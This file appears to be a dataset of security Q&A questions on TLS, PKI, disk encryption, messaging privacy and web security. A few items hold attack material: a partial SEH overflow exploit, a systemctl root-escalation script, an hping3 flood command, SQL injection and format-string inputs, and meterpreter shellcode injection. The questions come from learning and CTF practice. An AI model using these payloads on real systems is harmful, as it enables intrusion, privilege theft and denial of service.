instruction
stringlengths
24
29.9k
In a .NET application, communication between client and service can be implemented using various different bindings, NetTcpBinding being one of them. The class defines an attribute named Security, which, according to this article, defaults to Transport. This further article explains how Transport works: The NetTcpBind...
I am trying to understand how a SEH based buffer overflow is working and I have to write a paper about how an exploit works. I took this PoC for my paper. junk = "\x41" * 4091 nseh = "\x61\x62" seh = "\x57\x42" # Overwrite Seh # 0x00420057 : {pivot 8} prepare = "\x44\x6e\x53\x6e\x58\x6e\x05" prepare += "\...
I was looking at my company site and I saw Pusher API keys are exposed. Should it be kept public?
Goal The main goal is to monitor all the URL logging (HTTPS) of a specific device in my Network. So I’m decided to buy a Security tool WifiPineApple from Hak5 store. Ex. Alexa, Chromecast, and maybe iPad. Steps (Windows 10 PC) I did : configured a Network Sharing from my Ethernet to the WifiPineApple : here configure...
Can you do anything other than patching apps' compiled-code/cert-files (which is app-specific, requires manual analysis and patching + super-user/root) to intercept TLS traffic of apps that use certificate pinning? The answer seems to be No, from mitmproxy's docs: Certificate Pinning Some applications employ Certifica...
The recent epidemic situation has given me enough time to reconsider my password security seriously. I have devised a detailed plan for how to use elements such as a password manager, 2FA, U2F keys, etc. in conjunction with each other to create the optimal security architecture for my personal use (according to my rath...
Section 5.4 of the TLS 1.3 specification describes record padding. One of the mitigations for BREACH is to add random padding. Therefore, I'm wondering: Does TLS 1.3 require random record padding? I'm also unclear on if this padding is optional or required, and if it is always random. If TLS 1.3 random record padding ...
Related to this (too broad) question: How to implement my PKI? I have a self-signed CA (ca0) I would like to create a CA (ca1) with limited power derived from that first CA. ca1 should only be able to sign certificates for *.foo.com and for foo.com. From this question, I found out that the Name Constraints extension is...
Is the X.509 Certificate Signature an encrypted hash of just the public key or is it a hash of more then the just the key?
I'm new to assembly and have been playing around with it. While i was analyzing malware, I realised that there are multiple functions named sub_xxxxxx. How does one determine if this sub_xxxxxx is created by a user, or if it is a function that is imported from somewhere else?
Is it possible to use Signal without revealing my phone number to others? I'm personally using the Signal app on Android, but of course it applies to all versions, desktop and mobile. With Telegram for example, I can pick a username and then share that username. And people can contact me with just that username. No pho...
i have android 5.1 (motorola moto g xt1039). i encrypted the phone and set screen password. then after every password change i can choose one of an two options: 'require the password at startup' 'no thanks' when i choose the first one, phone asks for password before booting. when i choose the second option phone boo...
I am curious about security of proxy servers. I read a few threads and all of them were overly general or missed the point I am interested in, the devil is in the details. SCENARIO The malicious agent has a proxy server and HTTPS traffic goes through it, e.g. a client making connection to an HTTPS protected website. M...
I want to focus on technical aspects, not on the fact that they wanted to make a precedence. i assume the smartphone security architecture is following: cryptography chip. it's read only and stateless. it contains physical cryptography key. it offers some transformations of user input. it doesn't expose the key. it do...
I'm developing a mobile app. I have a question, and here is the scenario. If a person is logging into the App with google sign in API in a public network. The website will verify the user with his Email ID and if verified the website will in return returns the user details like his mobile number, address, and something...
I'm reasonably technically competent, but I don't know how to interpret this PC issue. As its a real-world incident, there's some back-story. I'm in the UK. The suspect PC runs Win8.1 up to date, used for simple desktop stuff by a family member. There are about 4 other PCs, all pretty much identically built, on the sa...
I have received an email flagged as spam from Yahoo but it was strange since it contained part of my password. The email states that they know my password so I better pay them in BTC. I think I had to change my password some years ago since Yahoo said it may have leaked, but I used the same base password with slight ch...
I know that PDFs can contain embedded images and Javascript. Can a PDF contain something that tracks you? For instance, can it contain a remote image that, when the PDF is opened, will fetch that image (thus revealing the user's IP address)? (Like a 1x1 image / web bug.) Or, can the Javascript trigger a GET request ...
I setup our .NET web application so that it has HSTS enabled. I verfied this by going to https://gf.dev/hsts-test and put in our URL and it shows that HSTS protection is there. The result shows: Strict-Transport-Security max-age=31536000; includeSubDomains However, our client comes back saying it is still not the ...
I am thinking of running my C++ Linux application via a mounted tmpfs. The idea is to have application client running in the embedded Linux platform and download the main application from a secure server into tmpfs with its necessary files and execute it. The secure server is running in the same premises as the embedd...
So I recently encountered a phishing email, I didn't follow the link of course, but I noticed it had a attachment file of 1KB I didn't download it, but was wondering whether it was possible to be infected with malware just from simply opening the email? I've read numerous times in regards to spam emails to not even ope...
For S3 bucket names, anyone can query a bucket name (without specifying an account owner) and see if the bucket is misconfigured to allow public access. Therefore, it arguably makes sense to use a complicated name to add an additional level of security, should the bucket settings ever accidentally be changed to public...
What security considerations should be taken into account when naming an S3 bucket?
I'm doing a CTF exercise here: https://c-wars.acnr.se/download/level2.tgz There is a docker with the vulnerable service, which I need to found the value of a variable. I was able to do it by the following input: == Login Service 1.0 == Username: %7$s Password: a Welcome: ACNR{_SERVICE_FLAG_} My issue now is that the s...
I have many password protected microsoft excel worksheet and I need to be able to edit it. I have forgotten the password, and I know that I can edit the file and take out the password check, but I have quite a few worksheets I would have to do this on. They all have the same password so I would like to crack the passwo...
Let's say the following scenario exists: A git repository exists on Azure DevOps Repos. The repository uses yaml pipelines (azure-pipelines.yml). The repository has branch policies to ensure that changes go through pull requests. The build pipeline has authorization to resources (Azure, Private Build Agent, etc.) The...
I am developing an ASP.NET Core web api project whose only client will be a mobile app developed in Xamarin. There will be no web frontend for the application. Can CSRF attacks be executed if the user can only login and consume the api from the mobile app? EDIT The api performs authentication by username and password ...
I'm searching for the right terminology for this element of cyber security. If I want to secure something like a PaaS for other applications to use, how is this usually called? It's not application security, because we are talking about the platform, and it's also not quite something like infrastructure security, as I ...
I am the creator of LessPass, a deterministic password generator. The core of LessPass is not very complicated. I have 2 methods calc_entropy and render_password: calc_entropy transforms the master password + site + login into a very large integer that I call entropy (I don't know if it's the right term, but it repres...
If someone has got your phone number can they hack into your phone using just the phone number? Perhaps by sending an SMS?
I am currently investigating the PEDICOM vulnerability CVE-2019-11687 where I am trying to reassemble the P-DATA DICOM fragments from a PCAP. Since the vulnerability takes advantage of writing bytes onto the header, I want to investigate this. When sniffing the network and trying to capture and reassemble the file, whe...
Recently, I started diving into cookies, but as far as the domain property is concerned I don't think it is straightforward. I read this article: http://web.archive.org/web/20200418163316/https://www.mxsasha.eu/blog/2014/03/04/definitive-guide-to-cookie-domains/ It points out the recommendation to keep your cookies saf...
On my Debian, I only do security updates: deb http://security.debian.org/debian-security/ buster/updates main deb-src http://security.debian.org/debian-security/ buster/updates main For example, Debian recently migrated from 10.3 to 10.4, but I still use version 10.3 and automatically install available security updates...
From time to time, I see this dialog box pop up on my MacBook Pro screen. It typically happens as the computer wakes up from sleep. Magic keyboard is trying to connect using an unsecured Bluetooth connection. Unsecured Bluetooth accessories can be used to control your computer or gain access to your data. At this p...
Scenario: A Windows user with Bitlocker-encrypted OS drive uses Win+L shortcut to lock their computer, but leaves it powered on. At this point, their house is raided (by police, or thieves, or FBI, simply someone with desire to gain access to the data and technical means to mount a proper attempt to do it). Question: W...
When starting a BitLocker-encrypted machine with a TPM and Windows 10 installed, you aren't prompted to enter a decryption key. The system relies on Windows lockscreen for authentication instead. My current understanding is that, when starting the system: The TPM checks whether the selected bootloader (i.e. the .EFI b...
I just conducted an automated web scan with Burp Suite Pro. The scanner result indicated that our website had a high severity of code injection. It gave the following proof: However, I don't understand why it interpreted like that: "The application appears to evaluate user input as code. It was instructed to sleep f...
I have a zip file, Example.zip consisting of a directory Example and three files *.dat. I can see the names of all 3 files. The dat files are encrypted (ZipCrypto Deflate). I'm interested to know if I can use bkcrack, and am aware of the required: at least 12 bytes of contiguous plaintext. My system has a modern 6c/...
I received a parcel from Amazon which I did not order, addressed to me. It contained Bluetooth earphones. It may just be part of a brushing scam, but it's got me curious. So my question is.. Could a Bluetooth device be disguised as earphones and actually contain malware? When attempting to connect my phone it appears a...
I still have an old good laptop from my ex employer that they never requested at the time I left (i assume it was old already by then) I would like to reuse this computer and not have the risk of being monitored (they had spy software to monitor employees). Which of the following options will prevent me from that risk:...
After some research on how I can protect my python source code on similar topics here and other sites, most agree that I should convert my .py file to .pyd using Cython, but the problem is in the space where I'm willing to sell the code (forex trading algorithm), a lot of people make living off decompiling source codes...
I think bluetooth has an authentication measure. As a user, when I get a new bluetooth keyboard, I have to: Go to my computer, search for bluetooth devices Put my keyboard in "pairing mode" My computer displays some random numbers which I have to enter in the keyboard I am hoping that then there is an authentication ...
Here is what I understand about how clients trust the tcp channels they are connected to. Alice asks Bob for his certificate, signed by a CA's private key Bob sends the certificate, which includes his common name (domain or ip) and an attached signed version of it. Alice uses her local public key from the CA to decryp...
For the past few months I regularly see alerts on my Synology about SSH connection being blocked. Somebody (here a nice Chinese guy from 222.186.15.158) was attempting to connect to my NAS with the root account (Fortunately PermitRootLogin is disabled). What I am a bit worried because if I see a public address here, it...
At the moment, I used this to make what I believe is a signed certificate in php <- Please correct me if I'm incorrect with this. But either way, after making a signed certificate, what next? How do I use it for my website (an aws ec2 ubuntu instance)? Is my understanding all wrong? I'm guessing there are docs out thei...
What is the best approach to use in identifying, characterizing and detecting compromised CAs? I do not mean an invalid certificate or invalid CA that can be identified by an X.509 during validation process. I am looking for a tool/approach that can identify and detect “trusted CA that is actually compromised. For exam...
Here I want to understand what if private API Documentation is exposed how can a hacker exploited the application as all the endpoints have authorization & authentication. its is really going to be helpful for a hacker to exploit with documentation of the API?
I have a Java App running, which prints out messages into STDOUT and also has an active interactive console (also accepts STDIN), when the server has started up. How do I securely give access to an external person (outside the network) to the console and nothing else? I was figuring using ncat --ssl -e java filenamehe...
I am evaluating options to choose email providers for a HIPAA compliant web application. I understand that, if the email contains any form of PHI, it would be violating the HIPAA rule especially if the email is not encrypted. What if the email that is been sent only contain a link to login and nothing else ? Would it ...
I was participating in a bug bounty on a website we will call example.com, when I ran into a very strange edge case which I am not sure I should report. The website uses ads and tracking similar to google analytics from a website we can call tracking.com. When visiting the example website there is an iframe to the trac...
I have been reading a lot about OAuth 2 flow recently, and I wanted to ask if this is applicable to the app that I am building, and what type of security I should be using. Context We have a native ios/android and angular SPA app. We build/own/control our own backend apis, and only our frontend apps can(should) commun...
I've been trying to find some answers regarding using MAC filtering on my router in addition to having WPA2 encryption but I couldn't find any clear ones. I understand that using MAC filtering solely is bad security practice since anyone can spoof any MAC address by using certain tools and use that MAC to connect to th...
I read everywhere regarding SQL injection where it is said that if SQL query is: SELECT * FROM table_name where username='xxxxx' AND password ='xxxx' and if you want to enter always true condition then you will have to use 'OR 1=1-- then the query will be: SELECT * FROM table_name where username=''OR 1=1--' AND passwo...
As per this answer RSA and ECC certificates should use different cipher suites. I tried to test it. It holds true for TLSv1.2. But for TLSv1.3 I see same cipher suite being used for both types of certificates(Tested via Google Chrome=>Dev Tools=>Security). Why is that? Here is how I generated an ECC cert: openssl ecpar...
I need to use a remote VPN for work and I want to use the Telegram desktop application on my PC while connected on the VPN. I would like to know whether the owners of the VPN service will be able to read Telegram messages in plaintext or not. Thanks
Currently, I'm trying to create a web-only end to end encrypted chat, with message persistency. I did some readup on how to create an end to end encrypted chat in JS, I found out there are quite some libs for encryption in js, which is good to know. I'd be capable of writing a chat straightaway now. However, I still h...
The brute force way to do this is to download all data from DropBox to a local PC and then re-upload to OneDrive, but I see there are "cloud based" solutions (i.e. cloudfuze, uBackup), which I assume do this via faster back-end links. Are any of these services certified as safe? It seems extremely risky to me to trust...
I have a target process I'm injecting meterpreter shellcode (windows/meterpreter/reverse_tcp) into, I manage to get a shell but when I exit it, the process exits as well. Is there any easy way to make the process survive the meterpreter exit besides debugging the process and changing to shellcode manually? I've added r...
If I do something like alert tcp any any <> any any (content:"TestA"; content:"TestB"; sid:1000000; msg:"Syntax correct!";) then the syntax is correct, but, what I would like to do is to match either "TestA" or "TestB". So if I get "TestA" from somewhere to my local IP I am alerted and if I respond with "TestB" I am ...
I want to investigate requests/responses between firefox and some private mysite.sharepoint.com site which I could access using my microsoft's email and password. For this I've configured Burp Suite's Proxy (and Firefox Proxy settings) to localhost:8085 Tried to configure on Certificates tab: Use a self-signed certif...
I'm still learning and this was a part of using systemctl for privilege escalation. eop=$(mktemp).service echo '[Service] ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output" [Install] WantedBy=multi-user.target' >$eop /bin/systemctl link $eop /bin/systemctl enable --now $eop
This was, before someone helpfully fixed it after seeing this question, a relatively unassuming and tiny photo of a ̶f̶i̶s̶h̶ nudibranch, with 283,620 pixels. It has some metadata: text Exif tags as well as 8.6kB of Color Profile information, and a 5,557-byte Thumbnail as well as a 648,534-byte Preview Image (that I c...
If A encrpyts the message and creates signature using his private key and sends through the network then only B with the public key of A can decrypt that message. But what if the attacker gets access to the public key of A and the encrypted message through the network? Will he be able to decrypt the message?
Is HSTS needed on a server that listens only on 443 port? If a MITM attack is carried out, the server won't respond on HTTP.
Recently, I was being redirected (occasionally, not every time) by "ilkmawgod.site" (no information on google) to malicious webpages. I scanned my every thing using quick heal, but it didn't find anything. I noticed this was happening with all the devices at home connected to the home router. Further, when I used mobil...
So as a rule of thumb I once learned that adding or removing HTML with JavaScript/JQuery (.html(),.append(), etc) leaves yourself wide open for DOM Based XSS Attacks. It is now my understanding that this is not 100% true. Supposedly there is a correct and safe way to add/remove HTML with JavaScript. I am hoping to lear...
Basically, when we execute a generate key command such as A0 then we receive a key-under-lmk for future use. What if we have multiple HSMs in a high availability configuration? How would we make sure that all keys-under-LMK mean the same thing to all HSM instances? The documentation I have doesn't cover this and I didn...
My router/access-point Zyxel nwa1123-ac pro stores passwords internally with a custom hashing algorithm. This is the resulting hash for the password "admin": $4$fmNgdX1E$mjanLAViUqqFtmlNhOl2lfQMpOE7LOeV3uk72A5zp+h8H2rsxFGz/DBA9Bz2BO2gOzqnDuvLNx/xzbDMqTSu3HVY9gvkgefDDHQ4gFur6YQ I couldn't find any similarities with exis...
I saw there are 2 available methods (that I know of and currently focusing on) to connect to a vpn. The first one is through their application based of that vpn provider. The others is by configuring VPN Connections > OpenVpn. I have searched on internet and found link1 and link2. Of course, method from link2 is easie...
I'm new to public key infrastructure but I think I understand how public key encryption works, conceptually. So a public key is, by definition, public and not a secret. Recently when I came across the term identity certificate and read about it, it sounded very similar to the public key of an entity. But, it was not ex...
I try to Man in the Middle the traffic of an App to a Cloud. For this purpose I use the Burp-Suite Pro Edition. What I've done: Setup a WiFi with an Alfa-Wifi-Dongle and create_ap; shared the network with my eth0. Connect my Mobile Device to it and tested connection to http://example.com Started an invisible proxy in ...
I'm developing a set of internal websites and services for a customer who has high levels of bureaucracy and strict formal rules about many things, one of them being "not storing passwords in plain text". So, when they inspected my system configuration manual, they immediately pointed out that they could not accept sto...
Using a web server with Nginx + ModSecurity + OWASP ModSecurity Core Rules... On the OWASP config file crs-setup.conf is the order of the config section SecAction important or can i order them differently from the example config file? Example: SecAction \ "id:900250,\ phase:1,\ nolog,\ pass,\ t:none,\ set...
Situation: We have several service accounts (AD) that need to use a limited set of credentials. These service accounts run scripts (PowerShell & Python), etc on different servers, requiring these credentials. These servers all run different versions of Windows Server (2012 - 2016) Currently the credentials are stored...
WSN (Wireless sensor networks) are mostly distributed low-power computers with sensing tasks that rely on limited battery life and therefore are not able to implement full-size security protocols. Depending on the kind of network (heterogeneous, homogeneous) and the environment they will be used in (likeliness of some ...
I cross-posted this on the manjaro forums and on server fault. So far no answer, so trying here. I have gnome-keyring running for sure, not sure it's gnome-keyring or gpg-agent or ssh-agent related... I use pass as command line password manager for many things. Usually, when querying pass, a dialog would appear asking ...
Is decrypting secrets with ccrypt and piping the result via stdin to openvpn secure? I've written the following alias to start an openvpn client more easily than before: sudo bash -c 'cd OPVN_CONFIGS_DIR && ccrypt --cat _auth.conf.cpt | openvpn --config waw-001.ovpn --auth-user-pass /dev/stdin' NB: OPVN_CONFIGS_DIR is...
Number of participants for group call is up to 8 for Whatsapp. Is group call P2P or through Whatsapp server like Zoom due to number of participants?
I used hping3 to stress test a web app (DoS): sudo hping3 -S --flood -V -p 80 [IP addr/url] When I attempted to get access to the target web application through my network, it refused to connect with the error This site can’t be reached. [website address] refused to connect Then, I used my mobile phone with 4G inte...
Received a spam link about "a package soon to be delivered" via an SMS message. Didn't click it in my phone, but couldn't help myself but to go to the URL in a browser on my laptop :grimace: (not great, I realize, spare me the lectures). There were no response bodies - seems the only thing it did was set headers and o...
These days, we have pretty secure systems. I have a mac with T2 security chip and the whole disk is encrypted via FileVault. iPhones are known to be pretty secure, with even FBI having a hard time breaking in. Windows machines can be encrypted with BitLocker or VeraCrypt. With these kinds of systems, is it really that ...
Most of the stuff on my laptop is benign; and the hassle of full disk encryption is not worth it. On the other hand, one or two folders I would love to encrypt and password protect. What's the best way to do this? I see a couple of options: There is an Advanced option on right click of folders natively which allows on...
I am currently working on a machine learning module to detect Operating Systems based on existing packet traffic in pcap file format. So far, I have generated some traffic of popular Operating Systems available. However, this process is very tedious. I would like to know if there is any publicly available pcap files th...
I want to authenticate a user using a username and password in a web app running javascript interfacing to a non node js or php server. In a normal desktop app I could use bcrypt or an hmac or ??. When I search the internet I come up with ambiguous results for HMAC and Javascript or Bcrypt and Javascript. Am I missing...
I find that sslsqueeze tool can carry attack on SSL/TLS server and does not need to perform any cryptographic operations. I think that no matter which cipher suite used in handshakes, the tool consumes the same CPU power. Then do cipher suites used in handshakes a factor to make the server more susceptible to the attac...
I'm creating a server that is in charge of building code. This server should be able to run arbitrary building scripts without those being able to harm the server. For example by modifying configuration files, tampering binaries or stealing secrets in home. Do you have any tips for this?
I work in security and I've seen modulus (modulo) used in many encoding and crypto algorithms. However, today, a friend of mine mentioned that using modulo like this: unsigned long int result = some_CSPRNG_output % 556600; "Limits the security effectiveness of the CSPRNG." If you are not familiar with C, the pseudo-cod...
I came across a thick client application recently. The application temporarily stores sensitive data (like username and password) in clear text in memory and the data is flushed once the user logs out or the application is closed. Inorder to increase the security implementation of the application is there any techniqu...
For the heck of it I wanted to see how much I could close down my router from the rest of the internet. I was hoping turning on the firewall, removing any port forwarding and turning off UPnP would make me unable to even browse the internet. However, my PS4 still had a connection when trying it out, also any internet b...
I want to buy a good quality printer, but I want it to be as safe as possible. All the good printers I see have wireless capabilities unfortunately. I know the safest would be a printer with no networking capabilities. If I buy a printer with wireless capability, but without setting the wifi up on it, is it safe, or is...
When a user attempts to access any URL without authentication (including a non-existent URL), my web service returns an HTTP 401 response. This response is JSON encoded, and the body of this response contains the path requested by the user, presumably for diagnostic purposes. The response also includes the www-authenti...
Kernels like linux-libre (standard in Debian and other free Linux distributions) ship no binary firmware packages by default. From my limited understanding of their functionality, a binary firmware package, or "blob", is loaded onto the respective device and run on it, so it should not be executed on the host system. ...
We have a system where medical devices are connected to an internal network (Ethernet, TCP/IP stack). Data from the medical device needs to be transmitted to the server over this internal network. This internal network is not connected to Internet! I was wondering if SSL/TLS will be indeed required here! What should be...
First, let me describe the problem I am trying to solve. I have a domain-based network. My Source Control server resides on this network. This meant only devices connected to the network (part of the domain) could access the Source Control server. Now I decided to move the Source Control server to a Cloud based serv...
A friend of mine lost the password of a zip file of her. She remembers that the password contains digits only (that is, only 0, 1, 2, 3, 4, 5, 6, 7, 8, and 9) and is 16 characters long or so. The digits in the password were chosen randomly, by randomly hitting keys. She kept her password in a TXT file, but the file is ...
Say I've restricted my Google Maps API key to the website example.com/*. This would mean that no other website domains could use my API key to make requests to maps.googleapis.com. However, using the API key through the browser address bar to make requests to maps.googleapis.com still works fine. Calls made through Pos...
I have a codebase that I've been keeping on Github that I don't want to worry about losing. I've intermittently backed up all the repos to an S3 instance, but this doesn't feel secure. If my Github and AWS accounts, or just my machine, were compromised then our entire codebase & its backups could be deleted. What can ...
There is the following question on a practice test: Which service are you addressing by installing a RAID array and load balancer? A. Confidentiality B. Availability C. Accountability D. Integrity The correct answer according to practice test is "Integrity". Can someone explain this and why it would not be "Availa...
I would like to find out where a website is hosted, in other words where the server/datacentre is located and the name of the company that provides the hosting. I have used the various websites that come up on google but they keep telling me that cloudflare etc. is the hoster when its not. Cloudflare doesn't host any f...
I have been reading into PAKE protocols, specifically starting with SRP RFC2945 The gist of the requirement on the server is that the server saves triplet (username, verifier (v), salt (s)) in the credentials table. Where verifier v = g^x % N (the ^ operator is the exponentiation operation) and x = SHA(<salt> | SHA(<us...